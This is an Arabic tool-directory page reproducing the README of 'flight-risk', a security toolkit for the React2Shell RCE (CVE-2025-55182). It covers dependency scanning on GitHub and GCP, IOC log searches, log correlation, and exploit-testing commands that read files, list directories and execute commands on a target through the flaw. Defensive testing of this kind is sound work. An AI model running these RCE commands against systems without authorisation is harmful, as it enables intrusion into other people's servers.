Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
flight-risk — مجموعة أدوات أمان لـ CVE-2025-55182 (React2Shell) — مسح، اكتشاف، ربط، واختبار ثغرة RCE في React Server Components | Kitploit
أدوات/GitHubGitHub/joaoreis13/flight-risk
إدارة مؤشرات الاختراق (IOC)ماسحات الثغرات الأمنيةأمن الحاوياتالاستغلالاستغلال تطبيقات الويبأمن السحابةDevSecOpsالاستجابة للحوادثتحليل السجلات
GitHubjoaoreis13/flight-risk

flight-risk

مجموعة أدوات أمان لـ CVE-2025-55182 (React2Shell) — مسح، اكتشاف، ربط، واختبار ثغرة RCE في React Server Components

منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

flight-risk

خطر الطيران /flaɪt rɪsk/ — بروتوكول Flight الخاص بـ React هو طبقة التسلسل وراء مكونات خادم React. يستغل CVE-2025-55182 ثغرة في إلغاء التسلسل في Flight لتحقيق تنفيذ تعليمات برمجية عن بعد (RCE) بدون مصادقة. إذا كان تطبيقك يستخدم RSC، فهو خطر طيران.

مجموعة أدوات أمنية لـ CVE-2025-55182 (React2Shell) — ثغرة تنفيذ تعليمات برمجية عن بعد (RCE) بدون مصادقة بتقييم CVSS 10.0 في مكونات خادم React. قم بالمسح والكشف والربط والاختبار.

ما بالداخل

الأداةالوظيفة
react2shell-scannerمسح مؤسسات GitHub ومشاريع GCP للعثور على تبعيات React/Next.js الضعيفة. اختبار استغلال مصرح به (فحص آمن، قراءة ملف، سرد دليل، تنفيذ أمر).
gcp-ioc-scannerالاستعلام عن سجلات GCP Cloud Logging للبحث عن أنماط مؤشرات الاختراق عبر مشاريع متعددة وخدمات K8s. تعريفات مؤشرات قابلة للتوصيل.
gcp-log-correlatorربط أحداث سجلات GCP حسب التقارب الزمني على نفس البود — مثلاً، العثور على طلب HTTP الذي تسبب في خطأ RCE.

بداية سريعة

root@kitploit:~
# Clone
git clone https://github.com/YOUR_USER/flight-risk.git
cd flight-risk

# Install dependencies
pip install -r react2shell-scanner/requirements.txt
pip install pyyaml   # for gcp-ioc-scanner

# Make scripts executable
chmod +x react2shell-scanner/bin/*
chmod +x gcp-ioc-scanner/gcp-ioc-scanner
chmod +x gcp-log-correlator/gcp-log-correlator

# Authenticate
gh auth login                          # GitHub scanning
gcloud auth application-default login  # GCP scanning + log analysis

الاستخدام

جميع الأوامر تُنفذ من جذر المستودع.

مسح مؤسسة GitHub للتبعيات الضعيفة

root@kitploit:~
react2shell-scanner/bin/scan-github \
  --org YOUR_GITHUB_ORG \
  --output ./results/github

مسح مشروع GCP للصور الحاوية الضعيفة

root@kitploit:~
react2shell-scanner/bin/scan-gcp \
  --project YOUR_GCP_PROJECT \
  --output ./results/gcp

مسح مدمج (GitHub + GCP)

root@kitploit:~
react2shell-scanner/bin/scan-all \
  --org YOUR_GITHUB_ORG \
  --project YOUR_GCP_PROJECT \
  --output ./results

كشف الثغرات الآمن (بدون تنفيذ تعليمات برمجية)

root@kitploit:~
python3 react2shell-scanner/cli.py https://your-app.example.com

اختبار استغلال مصرح به

root@kitploit:~
# Dry run — show payload without sending
python3 react2shell-scanner/cli.py --dry-run --verbose https://your-app.example.com

# Read file via RCE
python3 react2shell-scanner/cli.py --method read-file https://your-app.example.com /etc/hostname

# List directory via RCE
python3 react2shell-scanner/cli.py --method list-dir https://your-app.example.com /app

# Execute command via RCE
python3 react2shell-scanner/cli.py --method exec-cmd https://your-app.example.com "id"

# Batch targets
python3 react2shell-scanner/cli.py --targets targets.txt --output results.json

مسح سجلات GCP للبحث عن أنماط مؤشرات الاختراق

root@kitploit:~
gcp-ioc-scanner/gcp-ioc-scanner \
  --targets gcp-ioc-scanner/examples/targets-example.yaml \
  --iocs gcp-ioc-scanner/iocs/cve-2025-55182.yaml \
  --start 2026-01-01 \
  --end 2026-04-01 \
  --output ./results/ioc-scan

ربط أحداث السجلات (العثور على الطلب الذي تسبب في RCE)

root@kitploit:~
gcp-log-correlator/gcp-log-correlator \
  --project YOUR_GCP_PROJECT \
  --namespace frontend \
  --pod-pattern "web-app.*" \
  --trigger-filter 'severity=ERROR' \
  --preceding-filter 'httpRequest.requestMethod:*' \
  --window 30s \
  --start 2026-04-01T00:00:00Z \
  --end 2026-04-02T00:00:00Z \
  --format json,markdown \
  --output ./results/correlation

Docker

root@kitploit:~
cd react2shell-scanner
docker compose -f docker/docker-compose.yml build
docker compose -f docker/docker-compose.yml run scanner-shell

هيكل الدليل

root@kitploit:~
flight-risk/
├── README.md
├── LICENSE
├── react2shell-scanner/
│   ├── bin/                        # scan-github, scan-gcp, scan-all
│   ├── cli.py                      # Exploit testing CLI
│   ├── exploit.py                  # Exploitation logic
│   ├── utils.py                    # Shared utilities
│   ├── lib/                        # Shell + Python helpers
│   ├── vuln-defs/                  # Pluggable vulnerability definitions
│   ├── docker/                     # Containerized scanning
│   ├── examples/                   # Example scripts
│   ├── test-app/                   # Vulnerable Next.js fixture
│   └── requirements.txt
├── gcp-ioc-scanner/
│   ├── gcp-ioc-scanner             # IOC log scanner
│   ├── iocs/                       # IOC pattern definitions
│   └── examples/                   # Target config examples
└── gcp-log-correlator/
    ├── gcp-log-correlator          # Event correlator
    └── examples/                   # Correlation examples

المتطلبات

  • بايثون 3.10+
  • واجهة سطر أوامر GitHub (gh)
  • مجموعة أدوات Google Cloud SDK (gcloud)
  • jq
  • Docker 20.10+ (اختياري)

CVE-2025-55182

قانوني

للاستخدام المصرح به فقط. تحتوي هذه المجموعة على تعليمات برمجية لاستغلال الثغرات. استخدمها فقط ضد الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها. قد يؤدي الاستخدام غير المصرح به إلى انتهاك قانون الاحتيال وإساءة استخدام الكمبيوتر (18 U.S.C. 1030) والقوانين المماثلة.

الترخيص

MIT -- انظر LICENSE.

تنزيل الأداة
CVSS10.0 حرج
المتجهشبكة / بدون مصادقة / بدون تفاعل
React19.0.0 - 19.2.0 (تم الإصلاح في 19.3.0)
Next.js14.3.0 - 15.3.5, 16.0.0 - 16.0.7 (تم الإصلاح في 15.3.6, 16.0.8)
السبب الجذريإلغاء تسلسل غير آمن في بروتوكول Flight الخاص بـ React
التأثيرتنفيذ تعليمات برمجية عن بعد كامل كمستخدم عملية التطبيق